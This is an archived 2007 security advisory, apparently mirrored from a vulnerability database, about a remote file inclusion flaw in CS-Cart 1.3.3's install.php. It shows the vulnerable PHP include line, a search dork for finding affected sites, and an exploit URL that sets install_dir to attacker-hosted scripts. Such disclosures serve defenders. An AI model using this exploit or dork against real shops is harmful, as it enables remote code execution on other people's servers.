Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15670
HistoryJan 11, 2007 - 12:00 a.m.

CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability

2007-01-1100:00:00
vulners.com
3826

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability
$$ Script site: http://www.cs-cart.com
$$ Dork: Powered by CS-Cart - Shopping Cart Software
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Found: irvian
$$
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$Greetz:ibnusina and all
$$ Specjal greetz:#hitamputih
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

$install_dir = dirname(FILE);
$install_skins_dir = is_dir('./var/skins_repository') ? 'var/skins_repository' : 'skins';
include $install_dir.'/core/install.php'

Expl:
http://www.site.com/[CS-Cart_path]/install.php?install_dir=[evil_scripts]